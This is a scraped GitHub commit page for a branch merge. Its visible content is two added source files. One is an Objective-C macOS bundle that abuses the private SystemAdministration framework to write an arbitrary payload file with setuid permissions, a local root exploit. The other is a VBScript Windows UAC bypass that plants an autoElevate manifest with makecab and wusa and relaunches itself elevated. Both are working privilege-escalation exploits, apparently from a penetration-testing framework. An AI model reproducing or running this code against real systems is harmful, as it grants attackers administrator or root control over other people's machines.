Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge branch 'upstream-master' into land-5890-android-post-api
- Loading branch information
Showing
254 changed files
with
6,383 additions
and
6,390 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Binary file not shown.
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,33 @@ | ||
// gcc -bundle exploit.m -arch x86_64 -o exploit.daplug -framework Cocoa | ||
|
||
#include <dlfcn.h> | ||
#include <objc/objc.h> | ||
#include <objc/runtime.h> | ||
#include <objc/message.h> | ||
#include <Foundation/Foundation.h> | ||
|
||
#define PRIV_FWK_BASE "/System/Library/PrivateFrameworks" | ||
#define FWK_BASE "/System/Library/Frameworks" | ||
|
||
void __attribute__ ((constructor)) test(void) | ||
{ | ||
void* p = dlopen(PRIV_FWK_BASE "/SystemAdministration.framework/SystemAdministration", RTLD_NOW); | ||
|
||
if (p != NULL) | ||
{ | ||
id sharedClient = objc_msgSend(objc_lookUpClass("WriteConfigClient"), @selector(sharedClient)); | ||
objc_msgSend(sharedClient, @selector(authenticateUsingAuthorizationSync:), nil); | ||
id tool = objc_msgSend(sharedClient, @selector(remoteProxy)); | ||
|
||
NSString* inpath = [[[NSProcessInfo processInfo]environment]objectForKey:@"PAYLOAD_IN"]; | ||
NSString* outpath = [[[NSProcessInfo processInfo]environment]objectForKey:@"PAYLOAD_OUT"]; | ||
NSData* data = [NSData dataWithContentsOfFile:inpath]; | ||
|
||
objc_msgSend(tool, @selector(createFileWithContents:path:attributes:), | ||
data, | ||
outpath, | ||
@{ NSFilePosixPermissions : @04777 }); | ||
} | ||
|
||
exit(1); | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,62 @@ | ||
Option Explicit | ||
|
||
Dim oWs: Set oWs = CreateObject("WScript.Shell") | ||
Dim oFso: Set oFso = CreateObject("Scripting.FileSystemObject") | ||
Dim HOST_MANIFEST: HOST_MANIFEST = _ | ||
"<?xml version=""1.0"" encoding=""UTF-8"" standalone=""yes""?>" & vbCrLf & _ | ||
"<assembly xmlns=""urn:schemas-microsoft-com:asm.v1""" & vbCrLf & _ | ||
" xmlns:asmv3=""urn:schemas-microsoft-com:asm.v3""" & vbCrLf & _ | ||
" manifestVersion=""1.0"">" & vbCrLf & _ | ||
" <asmv3:trustInfo>" & vbCrLf & _ | ||
" <security>" & vbCrLf & _ | ||
" <requestedPrivileges>" & vbCrLf & _ | ||
" <requestedExecutionLevel level=""RequireAdministrator"" uiAccess=""false""/>" & vbCrLf & _ | ||
" </requestedPrivileges>" & vbCrLf & _ | ||
" </security>" & vbCrLf & _ | ||
" </asmv3:trustInfo>" & vbCrLf & _ | ||
" <asmv3:application>" & vbCrLf & _ | ||
" <asmv3:windowsSettings xmlns=""http://schemas.microsoft.com/SMI/2005/WindowsSettings"">" & vbCrLf & _ | ||
" <autoElevate>true</autoElevate>" & vbCrLf & _ | ||
" <dpiAware>true</dpiAware>" & vbCrLf & _ | ||
" </asmv3:windowsSettings>" & vbCrLf & _ | ||
" </asmv3:application>" & vbCrLf & _ | ||
"</assembly>" | ||
|
||
|
||
Sub Copy(ByVal sSource, ByVal sTarget) | ||
Dim sTempFile: sTempFile = GetTempFilename() | ||
oWs.Run "makecab """ & sSource & """ """ & sTempFile & """", 0, True | ||
oWs.Run "wusa """ & sTempFile & """ /extract:" & sTarget, 0, True | ||
oFso.DeleteFile sTempFile | ||
End Sub | ||
|
||
Sub Elevate() | ||
Const WINDIR = "%windir%" | ||
Dim sPath: sPath = Left(WScript.ScriptFullName, _ | ||
InStrRev(WScript.ScriptFullName, "\")) | ||
Dim sHost: sHost = Right(WScript.FullName, 11) | ||
Dim sManifest: sManifest = sPath & sHost & ".manifest" | ||
Dim oStream: Set oStream = oFso.CreateTextFile(sManifest) | ||
oStream.Write HOST_MANIFEST | ||
oStream.Close | ||
Copy sManifest, WINDIR | ||
Copy WScript.FullName, WINDIR | ||
oWs.Run WINDIR & "\" & sHost & " """ & WScript.ScriptFullName & """ /RESTART" | ||
oFso.DeleteFile sManifest | ||
End Sub | ||
|
||
Function GetTempFilename() | ||
Const vbTemporaryFolder = 2 | ||
Dim sTempFolder: sTempFolder = oFso.GetSpecialFolder(vbTemporaryFolder) | ||
GetTempFilename = oFso.BuildPath(sTempFolder, oFso.GetTempName()) | ||
End Function | ||
|
||
Sub RunAsAdmin() | ||
oWs.Run "COMMAND" | ||
End Sub | ||
|
||
If WScript.Arguments.Named.Exists("RESTART") Then | ||
RunAsAdmin | ||
Else | ||
Elevate | ||
End If |
Oops, something went wrong.